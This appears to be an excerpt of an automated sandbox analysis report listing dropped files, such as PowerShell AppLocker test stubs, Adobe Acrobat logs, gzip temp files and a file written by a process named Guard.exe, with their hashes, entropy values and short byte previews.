                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.z.{.z.{.z.{...z.z.{...z.z.{...z.z.{...z.z.{.z.{.{.{...z.z.{...{.z.{...z.z.{Rich.z.{........................PE..L............................T......P.............@..........................p......&.....@...... ..........................P...,....P..(....................`.......1..T...............................................L.......@....................text............................... ..`.data...|...........................@....idata..D).......*..................@..@.didat.......@.......$..............@....rsrc...(....P.......&..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................

                                                                        C:\Users\user\AppData\Local\Temp\MSIfa0d7.LOG

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):246
                                                                        Entropy (8bit):3.5213298467083405
                                                                        Encrypted:false
                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K87gwlNWRl:Qw946cPbiOxDlbYnuRK9wfWj
                                                                        MD5:7AC4FB4C10248221E10340E7E84D1C36
                                                                        SHA1:97F4C59121CE36A18536F570CCB4462BFC5A6118
                                                                        SHA-256:8AE276CDE34D931D964724A74CA721A60907B110BFFA933BB369E24F88E1B44B
                                                                        SHA-512:A5EC30377F122CC5EE9E49E5C7133DD25E4291DA2C28BB18B0C1441A2EA950F0CEE401F05C6EBE95221DB83A7563CF5B1F0FC1B5DDEED10CE77B22643F93FF68
                                                                        Malicious:false
                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.1.2./.2.0.2.4. . .0.3.:.0.5.:.3.4. .=.=.=.....

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fbvtxvj.ajg.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_diap1fpq.cmu.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eznlwjcu.tad.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyxtogmm.pnf.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4jwoovi.mhz.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kosirfkm.tmu.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tldxjgiu.wl5.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yetdv1mg.4my.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqnn0uul.kqy.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxa4dp1.4si.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-27 03-05-28-400.log

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with very long lines (393)
                                                                        Category:dropped
                                                                        Size (bytes):16525
                                                                        Entropy (8bit):5.33860678500249
                                                                        Encrypted:false
                                                                        SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                        MD5:C3FEDB046D1699616E22C50131AAF109
                                                                        SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                        SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                        SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                        Malicious:false
                                                                        Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):15114
                                                                        Entropy (8bit):5.361265441015613
                                                                        Encrypted:false
                                                                        SSDEEP:384:AfFmtTIbrg9iw/+33FHaekZXjMsfRN5etqZDNpDSbQ108awqqFJ3IXItEnlFN2Od:wjR
                                                                        MD5:3C4A290233F518DAEE313213D7EE3D9D
                                                                        SHA1:1F684E690A91619BAB0027713AED83CB667FD854
                                                                        SHA-256:CAE22C2CD3DB9D8F8D4789D04C8B393A2C01BB02288A34C18B4104B12C51BDC4
                                                                        SHA-512:7D0AAF5E1D5AE633B05B4AB593227FB99C4A4796852B0A7B5E1DD648948FF69C4D62F93747017B6DA75A9D0C6CF8AD6932D1BD7FE499DEC1EB5CEE2F211859C0
                                                                        Malicious:false
                                                                        Preview:SessionID=b2ba6e85-bbd6-4d78-81e7-c3f9242ac243.1735286728413 Timestamp=2024-12-27T03:05:28:413-0500 ThreadID=7988 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b2ba6e85-bbd6-4d78-81e7-c3f9242ac243.1735286728413 Timestamp=2024-12-27T03:05:28:415-0500 ThreadID=7988 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b2ba6e85-bbd6-4d78-81e7-c3f9242ac243.1735286728413 Timestamp=2024-12-27T03:05:28:415-0500 ThreadID=7988 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b2ba6e85-bbd6-4d78-81e7-c3f9242ac243.1735286728413 Timestamp=2024-12-27T03:05:28:415-0500 ThreadID=7988 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b2ba6e85-bbd6-4d78-81e7-c3f9242ac243.1735286728413 Timestamp=2024-12-27T03:05:28:415-0500 ThreadID=7988 Component=ngl-lib_NglAppLib Description="SetConf

                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):29752
                                                                        Entropy (8bit):5.407436513805711
                                                                        Encrypted:false
                                                                        SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbLfcbqIGccb5:ceo4+rsCGG7
                                                                        MD5:7580D4FF231542CDDD0751F093D7298D
                                                                        SHA1:108CF3AF4430A3FC279AF2E0B24E2FB9F6AE8759
                                                                        SHA-256:5A9F915EEDC44F8D0271F8BF7FD355C51B7386FD0947E70B49430E2DF37D1BB2
                                                                        SHA-512:C0CF60FE7E7DF49C9C5CD544302D879BC83CE33FC634197722897EA3D9A6C1EB2BC08F0A4EE3E774EBC3D5ADBD732D3DCF4FB4DF402472467AF0A7DEDB6AB8B3
                                                                        Malicious:false
                                                                        Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-

                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\06780aea-6dd6-4d9d-88bf-1b6d0c894c5a.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                        Category:dropped
                                                                        Size (bytes):758601
                                                                        Entropy (8bit):7.98639316555857
                                                                        Encrypted:false
                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                        MD5:3A49135134665364308390AC398006F1
                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                        Malicious:false
                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\37f32ad3-54c8-4589-9c4f-fd1534401497.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                        Category:dropped
                                                                        Size (bytes):386528
                                                                        Entropy (8bit):7.9736851559892425
                                                                        Encrypted:false
                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                        Malicious:false
                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\c018468d-5b6e-411f-b1a0-1db1d0989a49.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                        Category:dropped
                                                                        Size (bytes):1419751
                                                                        Entropy (8bit):7.976496077007677
                                                                        Encrypted:false
                                                                        SSDEEP:24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru
                                                                        MD5:CA6B0D9F8DDC295DACE8157B69CA7CF6
                                                                        SHA1:6299B4A49AB28786E7BF75E1481D8011E6022AF4
                                                                        SHA-256:A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7
                                                                        SHA-512:9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34
                                                                        Malicious:false
                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\e0a6bf3b-e8e2-41a1-b55d-302cdb0d13a5.tmp

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                        Category:dropped
                                                                        Size (bytes):1407294
                                                                        Entropy (8bit):7.97605879016224
                                                                        Encrypted:false
                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                        Malicious:false
                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                        C:\Users\user\AppData\Local\WordGenius Technologies\G

                                                                        Download File
                                                                        Process:C:\Users\Public\Guard.exe
                                                                        File Type:ASCII text, with very long lines (1266)
                                                                        Category:dropped
                                                                        Size (bytes):1149412
                                                                        Entropy (8bit):5.199720915817413
                                                                        Encrypted:false
                                                                        SSDEEP:12288:D8V+jcfSw6xHpcFTkUCroPzZsc2gmjoiVRS9CyaQZflhM8smx8/d:DcLkpcpLCrOzZTob5JAli1
                                                                        MD5:871CCC978BDD281E863F3495FD632585
                                                                        SHA1:A411AD4AA70904C07791EB70E98B63DCFD862711
                                                                        SHA-256:3A08EBD5BEC10B61C51F4D647A7CFCA5F6197DF364E79F8450AF8E4502F1283B
                                                                        SHA-512:094100D8A711F5386FF90734DDFA66CDE270CACF9E6E49438E13C4EFE92EF1A535ABEC200B05C2A1EB49DA6FF79CDF89036C971747D6C0E9E80078A51FF715A8
                                                                        Malicious:false
